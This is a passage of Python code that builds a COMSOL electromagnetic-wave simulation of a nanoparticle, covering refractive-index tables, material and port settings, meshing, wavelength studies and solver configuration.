\"3.8357e+00\"],\n [\"6.4973e-01\", \"3.9272e+00\"],\n [\"6.6263e-01\", \"4.0200e+00\"],\n [\"6.7579e-01\", \"4.1143e+00\"],\n [\"6.8920e-01\", \"4.2100e+00\"],\n [\"7.0289e-01\", \"4.3072e+00\"],\n [\"7.1684e-01\", \"4.4061e+00\"],\n [\"7.3107e-01\", \"4.5065e+00\"],\n [\"7.4559e-01\", \"4.6085e+00\"],\n [\"7.6039e-01\", \"4.7123e+00\"],\n [\"7.7549e-01\", \"4.8178e+00\"],\n [\"7.9088e-01\", \"4.9251e+00\"],\n [\"8.0658e-01\", \"5.0343e+00\"],\n [\"8.2260e-01\", \"5.1453e+00\"],\n [\"8.3893e-01\", \"5.2583e+00\"],\n [\"8.5558e-01\", \"5.3732e+00\"],\n [\"8.7257e-01\", \"5.4902e+00\"],\n [\"8.8989e-01\", \"5.6093e+00\"],\n [\"9.0756e-01\", \"5.7304e+00\"],\n [\"9.2557e-01\", \"5.8538e+00\"],\n [\"9.4395e-01\", \"5.9793e+00\"],\n [\"9.6269e-01\", \"6.1072e+00\"],\n [\"9.8180e-01\", \"6.2373e+00\"],\n [\"1.0013e+00\", \"6.3699e+00\"],\n [\"1.0212e+00\", \"6.5048e+00\"],\n [\"1.0414e+00\", \"6.6423e+00\"],\n [\"1.0621e+00\", \"6.7823e+00\"],\n [\"1.0832e+00\", \"6.9248e+00\"],\n [\"1.1047e+00\", \"7.0700e+00\"],\n [\"1.1266e+00\", \"7.2179e+00\"],\n [\"1.1490e+00\", \"7.3686e+00\"],\n [\"1.1718e+00\", \"7.5221e+00\"],\n [\"1.1951e+00\", \"7.6785e+00\"],\n [\"1.2188e+00\", \"7.8378e+00\"],\n [\"1.2430e+00\", \"8.0001e+00\"],\n [\"1.2677e+00\", \"8.1654e+00\"],\n [\"1.2929e+00\", \"8.3339e+00\"],\n [\"1.3185e+00\", \"8.5056e+00\"],\n [\"1.3447e+00\", \"8.6805e+00\"],\n [\"1.3714e+00\", \"8.8587e+00\"],\n [\"1.3986e+00\", \"9.0403e+00\"],\n [\"1.4264e+00\", \"9.2254e+00\"],\n [\"1.4547e+00\", \"9.4140e+00\"],\n [\"1.4836e+00\", \"9.6062e+00\"],\n [\"1.5130e+00\", \"9.8021e+00\"],\n [\"1.5431e+00\", \"1.0002e+01\"],\n [\"1.5737e+00\", \"1.0205e+01\"],\n [\"1.6050e+00\", \"1.0412e+01\"],\n [\"1.6368e+00\", \"1.0624e+01\"],\n [\"1.6693e+00\", \"1.0839e+01\"],\n [\"1.7025e+00\", \"1.1059e+01\"],\n [\"1.7363e+00\", \"1.1282e+01\"],\n [\"1.7707e+00\", \"1.1510e+01\"],\n [\"1.8059e+00\", \"1.1743e+01\"],\n [\"1.8417e+00\", \"1.1979e+01\"],\n [\"1.8783e+00\", \"1.2221e+01\"],\n [\"1.9156e+00\", \"1.2467e+01\"],\n [\"1.9536e+00\", \"1.2718e+01\"],\n [\"1.9924e+00\", \"1.2973e+01\"],\n [\"2.0319e+00\", \"1.3234e+01\"],\n [\"2.0723e+00\", \"1.3499e+01\"],\n [\"2.1134e+00\", \"1.3770e+01\"],\n [\"2.1554e+00\", \"1.4046e+01\"],\n [\"2.1982e+00\", \"1.4327e+01\"],\n [\"2.2418e+00\", \"1.4614e+01\"],\n [\"2.2863e+00\", \"1.4906e+01\"],\n [\"2.3317e+00\", \"1.5203e+01\"],\n [\"2.3780e+00\", \"1.5507e+01\"],\n [\"2.4252e+00\", \"1.5816e+01\"],\n [\"2.4734e+00\", \"1.6131e+01\"],\n [\"2.5225e+00\", \"1.6453e+01\"],\n [\"2.5725e+00\", \"1.6780e+01\"],\n [\"2.6236e+00\", \"1.7114e+01\"],\n [\"2.6757e+00\", \"1.7454e+01\"],\n [\"2.7288e+00\", \"1.7801e+01\"],\n [\"2.7830e+00\", \"1.8154e+01\"],\n [\"2.8383e+00\", \"1.8514e+01\"],\n [\"2.8946e+00\", \"1.8881e+01\"],\n [\"2.9521e+00\", \"1.9255e+01\"],\n [\"3.0107e+00\", \"1.9636e+01\"],\n [\"3.0704e+00\", \"2.0025e+01\"],\n [\"3.1314e+00\", \"2.0421e+01\"],\n [\"3.1936e+00\", \"2.0824e+01\"],\n [\"3.2570e+00\", \"2.1235e+01\"],\n [\"3.3216e+00\", \"2.1654e+01\"],\n [\"3.3876e+00\", \"2.2081e+01\"],\n [\"3.4548e+00\", \"2.2516e+01\"],\n [\"3.5234e+00\", \"2.2959e+01\"],\n [\"3.5934e+00\", \"2.3410e+01\"],\n [\"3.6647e+00\", \"2.3870e+01\"],\n [\"3.7375e+00\", \"2.4339e+01\"],\n [\"3.8117e+00\", \"2.4817e+01\"],\n [\"3.8873e+00\", \"2.5303e+01\"],\n [\"3.9645e+00\", \"2.5799e+01\"],\n [\"4.0432e+00\", \"2.6304e+01\"],\n [\"4.1235e+00\", \"2.6818e+01\"],\n [\"4.2053e+00\", \"2.7342e+01\"],\n [\"4.2888e+00\", \"2.7876e+01\"],\n [\"4.3740e+00\", \"2.8419e+01\"],\n [\"4.4608e+00\", \"2.8973e+01\"],\n [\"4.5494e+00\", \"2.9537e+01\"],\n [\"4.6397e+00\", \"3.0111e+01\"],\n [\"4.7318e+00\", \"3.0696e+01\"],\n [\"4.8257e+00\", \"3.1291e+01\"],\n [\"4.9216e+00\", \"3.1898e+01\"],\n [\"5.0193e+00\", \"3.2515e+01\"],\n [\"5.1189e+00\", \"3.3143e+01\"],\n [\"5.2205e+00\", \"3.3783e+01\"],\n [\"5.3242e+00\", \"3.4435e+01\"],\n [\"5.4299e+00\", \"3.5098e+01\"],\n [\"5.5377e+00\", \"3.5773e+01\"],\n [\"5.6476e+00\", \"3.6460e+01\"],\n [\"5.7597e+00\", \"3.7159e+01\"],\n [\"5.8741e+00\", \"3.7870e+01\"],\n [\"5.9907e+00\", \"3.8594e+01\"],\n [\"6.1096e+00\", \"3.9331e+01\"],\n [\"6.2309e+00\", \"4.0080e+01\"],\n [\"6.3546e+00\", \"4.0842e+01\"],\n [\"6.4808e+00\", \"4.1618e+01\"],\n [\"6.6094e+00\", \"4.2407e+01\"],\n [\"6.7407e+00\", \"4.3209e+01\"],\n [\"6.8745e+00\", \"4.4025e+01\"],\n [\"7.0110e+00\", \"4.4854e+01\"],\n [\"7.1502e+00\", \"4.5697e+01\"],\n [\"7.2921e+00\", \"4.6555e+01\"],\n [\"7.4369e+00\", \"4.7426e+01\"],\n [\"7.5845e+00\", \"4.8312e+01\"],\n [\"7.7351e+00\", \"4.9212e+01\"],\n [\"7.8887e+00\", \"5.0126e+01\"],\n [\"8.0453e+00\", \"5.1055e+01\"],\n [\"8.2050e+00\", \"5.1999e+01\"],\n [\"8.3679e+00\", \"5.2958e+01\"],\n [\"8.5340e+00\", \"5.3931e+01\"],\n [\"8.7034e+00\", \"5.4920e+01\"],\n [\"8.8762e+00\", \"5.5923e+01\"],\n [\"9.0524e+00\", \"5.6942e+01\"],\n [\"9.2322e+00\", \"5.7976e+01\"],\n [\"9.4154e+00\", \"5.9025e+01\"],\n [\"9.6024e+00\", \"6.0090e+01\"],\n [\"9.7930e+00\", \"6.1170e+01\"],\n [\"9.9874e+00\", \"6.2265e+01\"],\n [\"1.0186e+01\", \"6.3376e+01\"],\n [\"1.0388e+01\", \"6.4502e+01\"],\n [\"1.0594e+01\", \"6.5643e+01\"],\n [\"1.0804e+01\", \"6.6800e+01\"],\n [\"1.1019e+01\", \"6.7973e+01\"],\n [\"1.1238e+01\", \"6.9160e+01\"],\n [\"1.1461e+01\", \"7.0363e+01\"],\n [\"1.1688e+01\", \"7.1581e+01\"],\n [\"1.1920e+01\", \"7.2814e+01\"],\n [\"1.2157e+01\", \"7.4063e+01\"],\n [\"1.2398e+01\", \"7.5326e+01\"],\n ],\n )\n\n model.java.component(\"comp1\").material(\"mat5\").propertyGroup(\n \"RefractiveIndex\"\n ).func(\"int2\").set(\"fununit\", [\"1\"])\n model.java.component(\"comp1\").material(\"mat5\").propertyGroup(\n \"RefractiveIndex\"\n ).func(\"int2\").set(\"argunit\", [\"um\"])\n model.java.component(\"comp1\").material(\"mat5\").propertyGroup(\"RefractiveIndex\").set(\n \"n\",\n [\n \"nr(c_const/freq)\",\n \"0\",\n \"0\",\n \"0\",\n \"nr(c_const/freq)\",\n \"0\",\n \"0\",\n \"0\",\n \"nr(c_const/freq)\",\n ],\n )\n model.java.component(\"comp1\").material(\"mat5\").propertyGroup(\"RefractiveIndex\").set(\n \"ki\",\n [\n \"ni(c_const/freq)\",\n \"0\",\n \"0\",\n \"0\",\n \"ni(c_const/freq)\",\n \"0\",\n \"0\",\n \"0\",\n \"ni(c_const/freq)\",\n ],\n )\n model.java.component(\"comp1\").material(\"mat5\").propertyGroup(\n \"RefractiveIndex\"\n ).addInput(\"frequency\")\n\n model.java.component(\"comp1\").cpl(\"intop1\").set(\"opname\", \"intop_vol\")\n model.java.component(\"comp1\").cpl(\"intop2\").set(\"opname\", \"intop_surf\")\n\n model.java.component(\"comp1\").coordSystem(\"pml1\").set(\"wavelengthSource\", \"ewfd2\")\n\n model.java.common(\"cminpt\").set(\"modified\", [[\"frequency\", \"563.5 [THz]\"]])\n\n model.java.component(\"comp1\").physics(\"ewfd\").feature(\"wee1\").set(\n \"DisplacementFieldModel\", \"RelativePermittivity\"\n )\n model.java.component(\"comp1\").physics(\"ewfd\").feature(\"wee1\").set(\n \"omegap\", \"13.8*10^15\"\n )\n model.java.component(\"comp1\").physics(\"ewfd\").feature(\"wee1\").set(\"f\", Integer(1))\n model.java.component(\"comp1\").physics(\"ewfd\").feature(\"wee1\").set(\n \"omega0\", \"400[THz]\"\n )\n model.java.component(\"comp1\").physics(\"ewfd\").feature(\"wee1\").set(\n \"epsilonr_mat\", \"userdef\"\n )\n model.java.component(\"comp1\").physics(\"ewfd\").feature(\"wee1\").set(\n \"epsilonr\", [[0.054007], [0], [0], [0], [0.054007], [0], [0], [0], [0.054007]]\n )\n model.java.component(\"comp1\").physics(\"ewfd\").feature(\"wee1\").set(\n \"epsilonInf_mat\", \"from_mat\"\n )\n model.java.component(\"comp1\").physics(\"ewfd\").feature(\"wee1\").set(\n \"mur_mat\", \"userdef\"\n )\n model.java.component(\"comp1\").physics(\"ewfd\").feature(\"wee1\").set(\n \"sigma_mat\", \"userdef\"\n )\n model.java.component(\"comp1\").physics(\"ewfd\").feature(\"wee1\").set(\n \"sigma\",\n [[\"45e6\"], [\"0\"], [\"0\"], [\"0\"], [\"45e6\"], [\"0\"], [\"0\"], [\"0\"], [\"45e6\"]],\n )\n model.java.component(\"comp1\").physics(\"ewfd\").feature(\"wee2\").set(\n \"n\", [[\"na\"], [\"0\"], [\"0\"], [\"0\"], [\"na\"], [\"0\"], [\"0\"], [\"0\"], [\"na\"]]\n )\n model.java.component(\"comp1\").physics(\"ewfd\").feature(\"port1\").set(\"Pin\", \"P\")\n model.java.component(\"comp1\").physics(\"ewfd\").feature(\"port1\").set(\n \"PortType\", \"Periodic\"\n )\n model.java.component(\"comp1\").physics(\"ewfd\").feature(\"port1\").set(\n \"Eampl\", [[\"E0x\"], [\"E0y\"], [\"0\"]]\n )\n model.java.component(\"comp1\").physics(\"ewfd\").feature(\"port1\").set(\n \"alpha1_inc\", \"theta\"\n )\n model.java.component(\"comp1\").physics(\"ewfd\").feature(\"port1\").set(\n \"alpha2_inc\", \"phi\"\n )\n model.java.component(\"comp1\").physics(\"ewfd\").feature(\"port1\").set(\n \"n\", [[\"na\"], [\"0\"], [\"0\"], [\"0\"], [\"na\"], [\"0\"], [\"0\"], [\"0\"], [\"na\"]]\n )\n model.java.component(\"comp1\").physics(\"ewfd\").feature(\"port2\").set(\n \"PortType\", \"Periodic\"\n )\n model.java.component(\"comp1\").physics(\"ewfd\").feature(\"port2\").set(\n \"Eampl\", [[\"E0x\"], [\"E0y\"], [\"0\"]]\n )\n model.java.component(\"comp1\").physics(\"ewfd\").feature(\"port2\").set(\n \"n\", [[\"nb\"], [\"0\"], [\"0\"], [\"0\"], [\"nb\"], [\"0\"], [\"0\"], [\"0\"], [\"nb\"]]\n )\n model.java.component(\"comp1\").physics(\"ewfd\").feature(\"pc1\").set(\n \"PeriodicType\", \"Floquet\"\n )\n model.java.component(\"comp1\").physics(\"ewfd\").feature(\"pc1\").set(\n \"Floquet_source\", \"FromPeriodicPort\"\n )\n model.java.component(\"comp1\").physics(\"ewfd\").feature(\"pc2\").set(\n \"PeriodicType\", \"Floquet\"\n )\n model.java.component(\"comp1\").physics(\"ewfd\").feature(\"pc2\").set(\n \"Floquet_source\", \"FromPeriodicPort\"\n )\n model.java.component(\"comp1\").physics(\"ewfd2\").prop(\"BackgroundField\").set(\n \"SolveFor\", \"scatteredField\"\n )\n model.java.component(\"comp1\").physics(\"ewfd2\").prop(\"BackgroundField\").set(\n \"Eb\", [[\"ewfd.Ex\"], [\"ewfd.Ey\"], [\"ewfd.Ez\"]]\n )\n model.java.component(\"comp1\").physics(\"ewfd2\").feature(\"wee1\").set(\n \"DisplacementFieldModel\", \"RelativePermittivity\"\n )\n model.java.component(\"comp1\").physics(\"ewfd2\").feature(\"wee1\").set(\n \"omegap\", \"13.8*10^15\"\n )\n model.java.component(\"comp1\").physics(\"ewfd2\").feature(\"wee1\").set(\"f\", Integer(1))\n model.java.component(\"comp1\").physics(\"ewfd2\").feature(\"wee1\").set(\n \"omega0\", \"400[THz]\"\n )\n model.java.component(\"comp1\").physics(\"ewfd2\").feature(\"wee1\").set(\n \"mur_mat\", \"userdef\"\n )\n model.java.component(\"comp1\").physics(\"ewfd2\").feature(\"wee1\").set(\n \"sigma_mat\", \"userdef\"\n )\n\n model.java.component(\"comp1\").mesh(\"mesh1\").feature(\"size\").set(\"custom\", \"on\")\n model.java.component(\"comp1\").mesh(\"mesh1\").feature(\"size\").set(\"hmax\", \"lda0/6\")\n model.java.component(\"comp1\").mesh(\"mesh1\").feature(\"size1\").set(\n \"hauto\", Integer(4)\n )\n model.java.component(\"comp1\").mesh(\"mesh1\").feature(\"size2\").set(\"custom\", \"on\")\n model.java.component(\"comp1\").mesh(\"mesh1\").feature(\"size2\").set(\n \"hmax\", \"lda0/6/nb\"\n )\n model.java.component(\"comp1\").mesh(\"mesh1\").feature(\"size2\").set(\n \"hmaxactive\", JBoolean(True)\n )\n model.java.component(\"comp1\").mesh(\"mesh1\").feature(\"ftri1\").set(\n \"smoothmaxiter\", Integer(10)\n )\n model.java.component(\"comp1\").mesh(\"mesh1\").feature(\"ftri1\").set(\n \"smoothmaxdepth\", Integer(10)\n )\n model.java.component(\"comp1\").mesh(\"mesh1\").feature(\"ftet1\").set(\n \"smoothmaxiter\", Integer(10)\n )\n model.java.component(\"comp1\").mesh(\"mesh1\").feature(\"ftet1\").set(\n \"smoothmaxdepth\", Integer(10)\n )\n model.java.component(\"comp1\").mesh(\"mesh1\").feature(\"ftet1\").set(\"optlevel\", \"high\")\n model.java.component(\"comp1\").mesh(\"mesh1\").feature(\"swe1\").set(\n \"smoothmaxiter\", Integer(10)\n )\n model.java.component(\"comp1\").mesh(\"mesh1\").feature(\"swe1\").set(\n \"smoothmaxdepth\", Integer(10)\n )\n model.java.component(\"comp1\").mesh(\"mesh1\").feature(\"swe1\").feature(\"dis1\").set(\n \"numelem\", Integer(8)\n )\n model.java.component(\"comp1\").mesh(\"mesh1\").run()\n\n model.java.study().create(\"std1\")\n model.java.study(\"std1\").create(\"wave\", \"Wavelength\")\n model.java.study(\"std1\").create(\"wave2\", \"Wavelength\")\n model.java.study(\"std1\").feature(\"wave\").set(\n \"activate\",\n [\"ewfd\", \"on\", \"ewfd2\", \"off\", \"frame:spatial1\", \"on\", \"frame:material1\", \"on\"],\n )\n model.java.study(\"std1\").feature(\"wave2\").set(\n \"activate\",\n [\"ewfd\", \"off\", \"ewfd2\", \"on\", \"frame:spatial1\", \"on\", \"frame:material1\", \"on\"],\n )\n\n\n model.java.sol().create(\"sol1\")\n model.java.sol(\"sol1\").study(\"std1\")\n model.java.sol(\"sol1\").attach(\"std1\")\n model.java.sol(\"sol1\").create(\"st1\", \"StudyStep\")\n model.java.sol(\"sol1\").create(\"v1\", \"Variables\")\n model.java.sol(\"sol1\").create(\"s1\", \"Stationary\")\n model.java.sol(\"sol1\").create(\"st2\", \"StudyStep\")\n model.java.sol(\"sol1\").create(\"v2\", \"Variables\")\n model.java.sol(\"sol1\").create(\"s2\", \"Stationary\")\n model.java.sol(\"sol1\").feature(\"s1\").create(\"p1\", \"Parametric\")\n model.java.sol(\"sol1\").feature(\"s1\").create(\"fc1\", \"FullyCoupled\")\n model.java.sol(\"sol1\").feature(\"s1\").create(\"d1\", \"Direct\")\n model.java.sol(\"sol1\").feature(\"s1\").create(\"i1\", \"Iterative\")\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"i1\").create(\"mg1\", \"Multigrid\")\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"i1\").feature(\"mg1\").feature(\n \"pr\"\n ).create(\"va1\", \"Vanka\")\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"i1\").feature(\"mg1\").feature(\n \"po\"\n ).create(\"sv1\", \"SORVector\")\n model.java.sol(\"sol1\").feature(\"s1\").feature().remove(\"fcDef\")\n model.java.sol(\"sol1\").feature(\"s2\").create(\"p1\", \"Parametric\")\n model.java.sol(\"sol1\").feature(\"s2\").create(\"fc1\", \"FullyCoupled\")\n model.java.sol(\"sol1\").feature(\"s2\").create(\"i1\", \"Iterative\")\n model.java.sol(\"sol1\").feature(\"s2\").create(\"i2\", \"Iterative\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i1\").create(\"mg1\", \"Multigrid\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i1\").feature(\"mg1\").feature(\n \"pr\"\n ).create(\"sv1\", \"SORVector\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i1\").feature(\"mg1\").feature(\n \"po\"\n ).create(\"sv1\", \"SORVector\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i2\").create(\"mg1\", \"Multigrid\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i2\").feature(\"mg1\").feature(\n \"pr\"\n ).create(\"sv1\", \"SORVector\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i2\").feature(\"mg1\").feature(\n \"po\"\n ).create(\"sv1\", \"SORVector\")\n model.java.sol(\"sol1\").feature(\"s2\").feature().remove(\"fcDef\")\n model.java.sol().create(\"sol2\")\n model.java.sol(\"sol2\").study(\"std1\")\n model.java.sol(\"sol2\").label(\"Parametric Solutions 1\")\n model.java.result().dataset().remove(\"dset2\")\n model.java.result().numerical().create(\"int1\", \"IntVolume\")\n model.java.result().numerical().create(\"gev1\", \"EvalGlobal\")\n model.java.result().numerical(\"int1\").selection().named(\n f\"{nano_particle_handle}_dom\"\n )\n model.java.result().numerical(\"int1\").set(\"probetag\", \"none\")\n model.java.result().numerical(\"gev1\").set(\"probetag\", \"none\")\n model.java.result().create(\"pg1\", \"PlotGroup3D\")\n model.java.result().create(\"pg2\", \"PlotGroup1D\")\n model.java.result().create(\"pg3\", \"PlotGroup3D\")\n model.java.result(\"pg1\").create(\"mslc1\", \"Multislice\")\n model.java.result(\"pg2\").create(\"plz1\", \"Polarization\")\n model.java.result(\"pg2\").create(\"plz2\", \"Polarization\")\n model.java.result(\"pg2\").feature(\"plz1\").create(\"col1\", \"Color\")\n model.java.result(\"pg2\").feature(\"plz2\").create(\"col1\", \"Color\")\n model.java.result(\"pg3\").create(\"mslc1\", \"Multislice\")\n model.java.result(\"pg3\").feature(\"mslc1\").set(\"expr\", \"ewfd2.normE\")\n\n model.java.nodeGroup().create(\"grp1\", \"Definitions\", \"comp1\")\n model.java.nodeGroup(\"grp1\").set(\"type\", \"selection\")\n model.java.nodeGroup(\"grp1\").placeAfter(\"selection\", \"uni1\")\n\n model.java.study(\"std1\").feature(\"wave\").set(\"plist\", \"lda0\")\n model.java.study(\"std1\").feature(\"wave2\").set(\"plist\", \"lda0\")\n\n model.java.sol(\"sol1\").attach(\"std1\")\n model.java.sol(\"sol1\").feature(\"st1\").label(\"Compile Equations: Wavelength Domain\")\n model.java.sol(\"sol1\").feature(\"v1\").label(\"Dependent Variables 1.1\")\n model.java.sol(\"sol1\").feature(\"v1\").set(\"clistctrl\", [\"p1\"])\n model.java.sol(\"sol1\").feature(\"v1\").set(\"cname\", [\"lambda0\"])\n model.java.sol(\"sol1\").feature(\"v1\").set(\"clist\", [\"lda0\"])\n model.java.sol(\"sol1\").feature(\"s1\").label(\"Stationary Solver 1.1\")\n model.java.sol(\"sol1\").feature(\"s1\").set(\"stol\", 0.01)\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"dDef\").active(JBoolean(True))\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"dDef\").label(\"Direct 2\")\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"dDef\").set(\"linsolver\", \"pardiso\")\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"aDef\").label(\"Advanced 1\")\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"aDef\").set(\n \"complexfun\", JBoolean(True)\n )\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"p1\").label(\"Parametric 1.1\")\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"p1\").set(\"pname\", [\"lambda0\"])\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"p1\").set(\"plistarr\", [\"lda0\"])\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"p1\").set(\"punit\", [\"\\u00b5m\"])\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"p1\").set(\"pcontinuationmode\", \"no\")\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"p1\").set(\"preusesol\", \"auto\")\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"p1\").set(\n \"uselsqdata\", JBoolean(False)\n )\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"fc1\").label(\"Fully Coupled 1.1\")\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"d1\").label(\n \"Suggested Direct Solver (ewfd)\"\n )\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"i1\").label(\n \"Suggested Iterative Solver (ewfd)\"\n )\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"i1\").set(\"itrestart\", Integer(300))\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"i1\").set(\"prefuntype\", \"right\")\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"i1\").feature(\"ilDef\").label(\n \"Incomplete LU 1\"\n )\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"i1\").feature(\"mg1\").label(\n \"Multigrid 1.1\"\n )\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"i1\").feature(\"mg1\").set(\n \"iter\", Integer(1)\n )\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"i1\").feature(\"mg1\").feature(\n \"pr\"\n ).label(\"Presmoother 1\")\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"i1\").feature(\"mg1\").feature(\n \"pr\"\n ).feature(\"soDef\").label(\"SOR 1\")\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"i1\").feature(\"mg1\").feature(\n \"pr\"\n ).feature(\"va1\").label(\"Vanka 1.1\")\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"i1\").feature(\"mg1\").feature(\n \"pr\"\n ).feature(\"va1\").set(\"iter\", Integer(1))\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"i1\").feature(\"mg1\").feature(\n \"pr\"\n ).feature(\"va1\").set(\"vankavars\", [\"comp1_E\"])\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"i1\").feature(\"mg1\").feature(\n \"pr\"\n ).feature(\"va1\").set(\"vankasolv\", \"stored\")\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"i1\").feature(\"mg1\").feature(\n \"pr\"\n ).feature(\"va1\").set(\"vankarelax\", 0.95)\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"i1\").feature(\"mg1\").feature(\n \"po\"\n ).label(\"Postsmoother 1\")\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"i1\").feature(\"mg1\").feature(\n \"po\"\n ).feature(\"soDef\").label(\"SOR 1\")\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"i1\").feature(\"mg1\").feature(\n \"po\"\n ).feature(\"sv1\").label(\"SOR Vector 1.1\")\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"i1\").feature(\"mg1\").feature(\n \"po\"\n ).feature(\"sv1\").set(\"iter\", Integer(1))\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"i1\").feature(\"mg1\").feature(\n \"po\"\n ).feature(\"sv1\").set(\"relax\", 0.5)\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"i1\").feature(\"mg1\").feature(\n \"po\"\n ).feature(\"sv1\").set(\"sorvecdof\", [\"comp1_E\"])\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"i1\").feature(\"mg1\").feature(\n \"cs\"\n ).label(\"Coarse Solver 1\")\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"i1\").feature(\"mg1\").feature(\n \"cs\"\n ).feature(\"dDef\").label(\"Direct 1\")\n model.java.sol(\"sol1\").feature(\"st2\").label(\n \"Compile Equations: Wavelength Domain 2\"\n )\n\n model.java.sol(\"sol1\").feature(\"st2\").set(\"studystep\", \"wave2\")\n model.java.sol(\"sol1\").feature(\"v2\").label(\"Dependent Variables 2.1\")\n model.java.sol(\"sol1\").feature(\"v2\").set(\"initmethod\", \"sol\")\n model.java.sol(\"sol1\").feature(\"v2\").set(\"initsol\", \"sol1\")\n model.java.sol(\"sol1\").feature(\"v2\").set(\"solnum\", \"auto\")\n model.java.sol(\"sol1\").feature(\"v2\").set(\"notsolmethod\", \"sol\")\n model.java.sol(\"sol1\").feature(\"v2\").set(\"notsol\", \"sol1\")\n model.java.sol(\"sol1\").feature(\"v2\").set(\"notsolnum\", \"auto\")\n model.java.sol(\"sol1\").feature(\"v2\").set(\"clistctrl\", [\"p1\"])\n model.java.sol(\"sol1\").feature(\"v2\").set(\"cname\", [\"lambda0\"])\n model.java.sol(\"sol1\").feature(\"v2\").set(\"clist\", [\"lda0\"])\n model.java.sol(\"sol1\").feature(\"s2\").label(\"Stationary Solver 2.1\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"dDef\").active(JBoolean(True))\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"dDef\").label(\"Direct 1\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"dDef\").set(\"linsolver\", \"pardiso\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"aDef\").label(\"Advanced 1\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"aDef\").set(\n \"complexfun\", JBoolean(True)\n )\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"p1\").label(\"Parametric 1.1\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"p1\").set(\"pname\", [\"lambda0\"])\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"p1\").set(\"plistarr\", [\"lda0\"])\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"p1\").set(\"punit\", [\"\\u00b5m\"])\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"p1\").set(\"pcontinuationmode\", \"no\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"p1\").set(\"preusesol\", \"auto\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"p1\").set(\n \"uselsqdata\", JBoolean(False)\n )\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"fc1\").label(\"Fully Coupled 1.1\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i1\").label(\n \"Suggested Iterative Solver (ewfd2)\"\n )\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i1\").set(\"linsolver\", \"bicgstab\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i1\").feature(\"ilDef\").label(\n \"Incomplete LU 1\"\n )\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i1\").feature(\"mg1\").label(\n \"Multigrid 1.1\"\n )\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i1\").feature(\"mg1\").feature(\n \"pr\"\n ).label(\"Presmoother 1\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i1\").feature(\"mg1\").feature(\n \"pr\"\n ).feature(\"soDef\").label(\"SOR 1\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i1\").feature(\"mg1\").feature(\n \"pr\"\n ).feature(\"sv1\").label(\"SOR Vector 1.1\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i1\").feature(\"mg1\").feature(\n \"pr\"\n ).feature(\"sv1\").set(\"sorvecdof\", [\"comp1_E2\"])\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i1\").feature(\"mg1\").feature(\n \"po\"\n ).label(\"Postsmoother 1\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i1\").feature(\"mg1\").feature(\n \"po\"\n ).feature(\"soDef\").label(\"SOR 1\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i1\").feature(\"mg1\").feature(\n \"po\"\n ).feature(\"sv1\").label(\"SOR Vector 1.1\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i1\").feature(\"mg1\").feature(\n \"po\"\n ).feature(\"sv1\").set(\"sorvecdof\", [\"comp1_E2\"])\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i1\").feature(\"mg1\").feature(\n \"cs\"\n ).label(\"Coarse Solver 1\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i1\").feature(\"mg1\").feature(\n 